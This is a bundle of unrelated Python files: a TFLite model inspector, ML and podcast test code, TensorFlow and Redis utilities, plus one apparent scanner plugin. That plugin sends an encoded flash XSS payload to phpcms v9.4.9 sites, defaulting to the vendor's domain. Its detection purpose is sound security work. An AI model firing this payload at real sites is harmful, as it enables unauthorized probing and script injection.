# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import numpy
import flatbuffers
import tflite.Model
import tflite.SubGraph
import argparse
import graph_stats
from operator_parser import OperatorParser
from subgraph_printer import SubgraphPrinter
from model_saver import ModelSaver
class TFLiteModelFileParser(object):
def __init__(self, args):
# Read flatbuffer file descriptor using argument
self.tflite_file = args.input_file
# Set print level (0 ~ 1)
self.print_level = args.verbose
if (args.verbose > 1):
self.print_level = 1
if (args.verbose < 0):
self.print_level = 0
# Set tensor index list to print information
self.print_all_tensor = True
if (args.tensor != None):
if (len(args.tensor) != 0):
self.print_all_tensor = False
self.print_tensor_index = []
for tensor_index in args.tensor:
self.print_tensor_index.append(int(tensor_index))
# Set operator index list to print information
self.print_all_operator = True
if (args.operator != None):
if (len(args.operator) != 0):
self.print_all_operator = False
self.print_operator_index = []
for operator_index in args.operator:
self.print_operator_index.append(int(operator_index))
# Set config option
self.save = False
if args.config:
self.save = True
self.save_config = True
if self.save == True:
self.save_prefix = args.prefix
def PrintModel(self, model_name, op_parser):
printer = SubgraphPrinter(self.print_level, op_parser, model_name)
if self.print_all_tensor == False:
printer.SetPrintSpecificTensors(self.print_tensor_index)
if self.print_all_operator == False:
printer.SetPrintSpecificOperators(self.print_operator_index)
printer.PrintInfo()
def SaveModel(self, model_name, op_parser):
saver = ModelSaver(model_name, op_parser)
if self.save_config == True:
saver.SaveConfigInfo(self.save_prefix)
def main(self):
# Generate Model: top structure of tflite model file
buf = self.tflite_file.read()
buf = bytearray(buf)
tf_model = tflite.Model.Model.GetRootAsModel(buf, 0)
stats = graph_stats.GraphStats()
# Model file can have many models
for subgraph_index in range(tf_model.SubgraphsLength()):
tf_subgraph = tf_model.Subgraphs(subgraph_index)
model_name = "#{0} {1}".format(subgraph_index, tf_subgraph.Name())
# 0th subgraph is main subgraph
if (subgraph_index == 0):
model_name += " (MAIN)"
# Parse Operators
op_parser = OperatorParser(tf_model, tf_subgraph)
op_parser.Parse()
stats += graph_stats.CalcGraphStats(op_parser)
if self.save == False:
# print all of operators or requested objects
self.PrintModel(model_name, op_parser)
else:
# save all of operators in this model
self.SaveModel(model_name, op_parser)
print('==== Model Stats ({} Subgraphs) ===='.format(tf_model.SubgraphsLength()))
print('')
graph_stats.PrintGraphStats(stats, self.print_level)
if __name__ == '__main__':
# Define argument and read
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument(
"input_file", type=argparse.FileType('rb'), help="tflite file to read")
arg_parser.add_argument(
'-v', '--verbose', type=int, default=1, help="set print level (0~1, default: 1)")
arg_parser.add_argument(
'-t', '--tensor', nargs='*', help="tensor ID to print information (default: all)")
arg_parser.add_argument(
'-o',
'--operator',
nargs='*',
help="operator ID to print information (default: all)")
arg_parser.add_argument(
'-c',
'--config',
action='store_true',
help="Save the configuration file per operator")
arg_parser.add_argument(
'-p', '--prefix', help="file prefix to be saved (with -c/--config option)")
args = arg_parser.parse_args()
# Call main function
TFLiteModelFileParser(args).main()
|
#!/usr/bin/env python
#coding = utf-8
import re,urllib,md5
def assign(service, arg):
if service == "phpcms":
return True, arg
def audit(arg):
url = arg
md5_check_value = 'cf00b069e36e756705c49b3a3bf20c40'
payload = urllib.unquote("statics/js/ckeditor/plugins/flashplayer/player/player.swf?skin=skin.swf%26stream%3D%5C%2522%29%29%7Dcatch%28e%29%7Balert%281%29%7D%2f%2f")
code, head, res, errcode, _ = curl.curl(url+payload)
if code == 200:
md5_buff = md5.new(res).hexdigest()
if md5_buff in md5_check_value:
security_info(url + 'phpcms v9.4.9 flash xss')
if __name__ == '__main__':
from dummy import *
audit(assign('phpcms', "http://www.phpcms.cn/")[1])
|
import asyncio
import logging
from asyncio import CancelledError
import pytest
import lightbus
import lightbus.path
from lightbus import EventMessage
from lightbus.utilities.async_tools import cancel
pytestmark = pytest.mark.reliability
logger = logging.getLogger(__name__)
@pytest.mark.asyncio
async def test_random_failures(
bus: lightbus.path.BusPath, new_bus, caplog, fire_dummy_events, dummy_api, mocker
):
"""Keep killing bus clients and check that we don't loose an events regardless"""
caplog.set_level(logging.WARNING)
event_ok_ids = dict()
history = []
async def listener(event_message: EventMessage, field, **kwargs):
call_id = int(field)
event_ok_ids.setdefault(call_id, 0)
event_ok_ids[call_id] += 1
await asyncio.sleep(0.03)
# Put a lot of events onto the bus (we'll pull them off shortly)
bus.client.register_api(dummy_api)
for n in range(0, 100):
await bus.my.dummy.my_event.fire_async(field=str(n))
# Now pull the events off, and sometimes kill a worker early
for n in range(0, 120):
cursed_bus: lightbus.path.BusPath = new_bus(service_name="test")
cursed_bus.my.dummy.my_event.listen(
listener, listener_name="test", bus_options={"since": "0"}
)
await cursed_bus.client._setup_server()
await asyncio.sleep(0.02)
if n % 5 == 0:
# Cancel 1 in every 5 attempts at handling the event
cursed_bus.client._event_listeners[0].listener_task.cancel()
await asyncio.sleep(0.05)
await cursed_bus.client.close_async()
duplicate_calls = [n for n, v in event_ok_ids.items() if v > 1]
assert len(event_ok_ids) == 100
assert len(duplicate_calls) > 0
|
import os
import collections
import pandas
import matplotlib, seaborn, numpy
from matplotlib import pyplot
import sklearn
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.pipeline import Pipeline
from sklearn.linear_model import SGDClassifier, LogisticRegression
from sklearn.tree import DecisionTreeRegressor
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor
from sklearn.model_selection import cross_val_score
import nsp2_interface
def count_aa(string):
total_counts = []
amino_acids = ['H', 'E', 'V', 'A', 'N', 'M', 'K', 'F', 'I', 'P', 'D', 'R', 'Y', 'T', 'S', 'W', 'G', 'C', 'L', 'Q']
for aa in amino_acids:
total_counts.append(string.lower().count(aa.lower()))
return total_counts
def count_attribute(string, attribute):
charged = ['R', 'K', 'D', 'E']
polar = ['Q', 'N', 'H', 'S', 'T', 'Y', 'C', 'W']
nonpolar = ['A', 'I', 'L', 'M', 'F', 'V', 'P', 'G']
aa_list = None
if attribute == "charged":
aa_list = charged
elif attribute == "polar":
aa_list = polar
elif attribute == "nonpolar":
aa_list = nonpolar
else:
raise(ValueError())
aa_sum = 0
for aa in aa_list:
aa_sum = aa_sum + string.lower().count(aa.lower())
return(aa_sum)
nsp2 = nsp2_interface.NSP2()
df = pandas.read_csv("{}/data/train.20171126.csv".format(os.path.dirname(os.path.realpath(__file__))))
df["binary_label"] = df.ratio > 0.5
cross_val_score_args = {'cv': 5, 'n_jobs': -1, "scoring": "roc_auc", "groups": df.uniprot_accession.values}
scores = collections.OrderedDict()
print(len(df["sequence_aa"]))
print(len(df["uniprot_accession"]))
print(list(df))
sequences = df["sequence_aa"]
just_amino_acids = []
just_nsp2_features = []
combined = []
for num in range(len(sequences)):
#for num in range(10):
uniprot_id = df['id'][num].split("|")[1]
start = int(df['id'][num].split("|")[2].split("-")[0])
end = int(df['id'][num].split("|")[2].split("-")[1])
num_aa = count_aa(df["sequence_aa"][num])
just_amino_acids.append(num_aa)
#print("{}, {}".format(start, end))
nsp2_features = nsp2.get_summed_attributes_vector(uniprot_id, start, end)
just_nsp2_features.append(nsp2_features)
combined_vector = num_aa + nsp2_features
#print(final_vector)
combined.append(combined_vector)
cross_val_score_args = {'cv': 5, 'n_jobs': -1, "scoring": "roc_auc", "groups": df.uniprot_accession.values}
scores = collections.OrderedDict()
score = cross_val_score(
LogisticRegression(),
just_amino_acids,
df.binary_label, #y
**cross_val_score_args)
scores["LogisticRegression kmers=1"] = (score)#, pipeline)
print("Just Amino Acids")
print(score)
print(numpy.mean(score))
print("")
score = cross_val_score(
LogisticRegression(),
just_nsp2_features,
df.binary_label, #y
**cross_val_score_args)
scores["LogisticRegression kmers=1"] = (score)#, pipeline)
print("Just NSP2")
print(score)
print(numpy.mean(score))
print("")
score = cross_val_score(
LogisticRegression(),
combined,
df.binary_label, #y
**cross_val_score_args)
scores["LogisticRegression kmers=1"] = (score)#, pipeline)
print("Combined")
print(score)
print(numpy.mean(score))
#sequences, classification = parse_bepipred.get_bepipred_data()
"""
for num in range(len(df["sequence_aa"])):
print(df["sequence_aa"][num])
print(df["binary_label"][num])
"""
#for seq in df["sequence_aa"]:
# print(seq) |
#!/usr/bin/env python
import os
import responses
import unittest
import shutil
from pydub import AudioSegment
from datetime import datetime
from typecaster import utils
import xml.etree.ElementTree as ET
class Object(object):
pass
def catch_requests():
# Catch synthesize requests and insert test .wav file as response
with open("tests/test_files/test.wav", "rb") as test:
test_response = test.read()
responses.add(responses.GET, 'https://stream.watsonplatform.net/text-to-speech/api/v1/synthesize',
body=test_response, status=200)
class TestUtils(unittest.TestCase):
def setUp(self):
self.podcast = Object()
self.podcast.title = 'Test Podcast'
self.podcast.link = 'http://test.com'
self.podcast.author = 'Test Author'
self.podcast.description = 'This is a test podcast'
self.podcast.output_path = '.test_utils'
self.podcast.language = 'en-us'
self.podcast.subtitle = None
self.podcast.owner_name = None
self.podcast.owner_email = None
self.podcast.image = None
self.podcast.categories = ['News', 'Sports']
self.podcast.copyright = None
self.podcast.episodes = {}
self.podcast.episodes['Test Episode 1'] = Object()
self.podcast.episodes['Test Episode 1'].text = 'hello'
self.podcast.episodes['Test Episode 1'].text_format = 'plain'
self.podcast.episodes['Test Episode 1'].title = 'Test Episode 1'
self.podcast.episodes['Test Episode 1'].author = 'Test Episode Author'
self.podcast.episodes['Test Episode 1'].published = True
self.podcast.episodes['Test Episode 1'].summary = None
self.podcast.episodes['Test Episode 1'].link = '.test/test_episode_1.mp3'
self.podcast.episodes['Test Episode 1'].publish_date = datetime.utcnow()
self.podcast.episodes['Test Episode 1'].length = 3884
self.podcast.episodes['Test Episode 1'].duration = '00:00:0.9'
self.podcast.episodes['Test Episode 1'].synth_args = {'username': '', 'password': ''}
self.feed = ET.parse('tests/test_files/test_feed.xml')
self.feed_string = ET.tostring(self.feed.getroot()).decode().replace(' ', '').replace('\n', '')
self.synthesizer = 'watson'
self.synth_args = {'username': '', 'password': ''}
if not os.path.exists(self.podcast.output_path):
os.makedirs(self.podcast.output_path)
@responses.activate
def test_text_to_speech(self):
catch_requests()
text = ('hello')
audio = utils.text_to_speech(text=text, synthesizer=self.synthesizer, synth_args=self.synth_args, sentence_break='. ')
sample = AudioSegment.from_wav('tests/test_files/test.wav')
audio.export('.test_utils/test.mp3', format='mp3')
self.assertEquals(len(audio), len(sample))
@responses.activate
def test_text_to_speech_synth_not_found(self):
catch_requests()
text = ('hello')
with self.assertRaises(ValueError):
audio = utils.text_to_speech(text=text, synthesizer='not found', synth_args=self.synth_args, sentence_break='. ') # noqa
@responses.activate
def test_text_to_speech_sentence_break(self):
catch_requests()
text = ('hello ' * 51)
audio = utils.text_to_speech(text=text, synthesizer=self.synthesizer, synth_args=self.synth_args, sentence_break=' ')
sample = AudioSegment.from_wav('tests/test_files/test.wav')
self.assertGreater(len(audio), len(sample) * 50)
@responses.activate
def test_text_to_speech_break_synth_not_found(self):
catch_requests()
text = ('hello ' * 51)
with self.assertRaises(ValueError):
audio = utils.text_to_speech(text=text, synthesizer='not found', synth_args=self.synth_args, sentence_break=' ') # noqa
@responses.activate
def test_text_to_speech_credential_warning(self):
catch_requests()
with self.assertRaises(Warning):
audio = utils.text_to_speech(text='text', synthesizer=self.synthesizer, synth_args={}, sentence_break=' ')
with self.assertRaises(Warning):
audio = utils.text_to_speech(text='text', synthesizer=self.synthesizer, synth_args={'username': ''}, sentence_break=' ') # noqa
def test_build_rss_feed(self):
# This test ignores the pubDate tag in the RSS feed.
utils.build_rss_feed(self.podcast)
feed = ET.parse('.test_utils/feed.xml')
feed_root = feed.getroot()
items = feed_root.find('channel').findall('item')
for item in items:
item.remove(item.find('pubDate'))
feed_string = ET.tostring(feed_root).decode().replace(' ', '')
self.assertEquals(feed_string, self.feed_string)
def tearDown(self):
if os.path.exists('.temp.wav'):
os.remove('.temp.wav')
if os.path.exists('.test_utils/'):
shutil.rmtree('.test_utils/')
|
import numpy as np
import tensorflow as tf
def _to_int32(a):
return np.int32(np.ceil(a))
def extract_patches(detector: tf.keras.models.Model,
img: tf.TensorArray,
min_score: float = 0.4,
max_boxes: int = 10):
shape = tf.shape(img)
im_height, im_width = shape[0].numpy(), shape[1].numpy()
result = detector(img[tf.newaxis, ...])
result = {key: value.numpy() for key, value in result.items()}
boxes = result["detection_boxes"][0]
# entities = result["detection_class_entities"]
scores = result["detection_scores"][0]
examples = []
for i in range(min(len(boxes), max_boxes)):
if scores[i] >= min_score:
example = {}
ymin, xmin, ymax, xmax = tuple(boxes[i])
# class_name = entities[i].decode("ascii")
xmin, xmax, ymin, ymax = _to_int32(xmin * im_width), _to_int32(xmax * im_width), _to_int32(
ymin * im_height), _to_int32(ymax * im_height)
tmp = tf.image.crop_to_bounding_box(img, ymin, xmin, ymax - ymin, xmax - xmin)
# example["class_name"] = class_name
example["arr"] = tmp.numpy()
example["score"] = scores[i]
example["bounding_box"] = (xmin, xmax, ymin, ymax)
examples.append(example)
return {
"results": examples,
"height": im_height,
"width": im_width
}
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utils related to pipeline"""
import os
import subprocess
from six.moves import urllib
from taskflow import engines
from taskflow.patterns import linear_flow
from artman.tasks import io_tasks
from artman.utils.logger import logger
def validate_exists(required, **kwargs):
for arg in required:
if arg not in kwargs:
raise ValueError('{0} must be provided'.format(arg))
def validate_does_not_exist(unsupported, **kwargs):
for arg in unsupported:
if arg in kwargs:
raise ValueError('{0} is not supported'.format(arg))
def download(url, directory):
filename = os.path.basename(urllib.parse.urlsplit(url).path)
if not os.path.isfile(os.path.join(directory, filename)):
subprocess.check_call(['mkdir', '-p', directory])
logger.info('Downloading file from URL: %s' % url)
subprocess.check_call(['curl', '-o', directory + filename, '-sL', url])
return directory + filename
def task_transition(state, details):
logger.info('Task "%s" transition to state %s.' %
(details['task_name'], state))
def download_from_gcs(bucket_name, path, output_dir):
flow = linear_flow.Flow('download_from_gcs')
args = {'bucket_name': bucket_name, 'path': path, 'output_dir': output_dir}
flow.add(io_tasks.BlobDownloadTask('BlobDownload'))
engine = engines.load(flow, engine="serial", store=args)
engine.run()
|
from __future__ import absolute_import
import logging
import redis
import time
from contextlib import contextmanager
from random import random
from .container import Container
class UnableToGetLock(Exception):
pass
class _Redis(object):
def __init__(self, app, options):
self.app = app
self.redis = redis.from_url(app.config['REDIS_URL'])
self.logger = logging.getLogger(app.name + '.redis')
# TODO(kylec): Version check to fail early if we're connected to a
# redis-server that doesn't support the operations we use.
def __getattr__(self, name):
return getattr(self.redis, name)
@contextmanager
def lock(self, lock_key, expire=None, blocking_timeout=3, nowait=False):
"""
Returns a context for locking a redis lock with the given key
Args:
lock_key (string): key to lock
expire (float): how long (in seconds) we can hold lock before it is
automatically released
blocking_timeout (float): how long (in seconds) to try locking until we give up.
nowait (bool): if True, don't block if can't acquire the lock
(will instead raise an exception)
"""
conn = self.redis
if expire is None:
expire = blocking_timeout
delay = 0.01 + random() / 10
lock = conn.lock(lock_key, timeout=expire, sleep=delay)
acquired = lock.acquire(blocking=not nowait, blocking_timeout=blocking_timeout)
# This is likely slightly after it was actually acquired, but it avoids reporting blocked
# time as time spent holding the lock.
start = time.time()
self.logger.info('Acquiring lock on %s', lock_key)
if not acquired:
raise UnableToGetLock('Unable to fetch lock on %s' % (lock_key,))
try:
yield
finally:
self.logger.info('Releasing lock on %s', lock_key)
try:
lock.release()
except Exception:
# notably, an exception is raised if we release a lock we don't
# own, e.g. because it expired while we held it.
self.logger.exception("Error releasing lock %s acquired around %ss ago", lock_key, time.time() - start)
def incr(self, key):
self.redis.incr(key)
def decr(self, key):
self.redis.decr(key)
def Redis(**o):
return Container(_Redis, o, name='redis')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.